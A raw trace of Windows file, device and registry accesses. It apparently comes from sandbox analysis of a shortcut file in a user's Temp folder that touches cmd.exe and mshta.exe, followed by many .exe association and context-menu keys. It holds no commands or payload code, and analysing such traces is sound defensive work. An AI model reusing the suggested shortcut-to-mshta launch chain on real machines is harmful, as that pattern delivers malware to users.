\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\D3D10Warp.dll
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\mshta.exe
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
HKEY_CLASSES_ROOT\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.Exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\DataHandler
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\DataHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_CLASSES_ROOT\CLSID\{596AB062-B4D2-4215-9F74-E9109B0A8153}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\NoAddToRecent
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\NoAddToRecent
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_CLASSES_ROOT\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{00F3C2EC-A6EE-11DE-A03A-EF8F55D89593}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{1D27F844-3A1F-4410-85AC-14651078412D}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_CLASSES_ROOT\CLSID\{37EA3A21-7493-4208-A011-7F9EA79CE9F5}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\LinkHandler
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
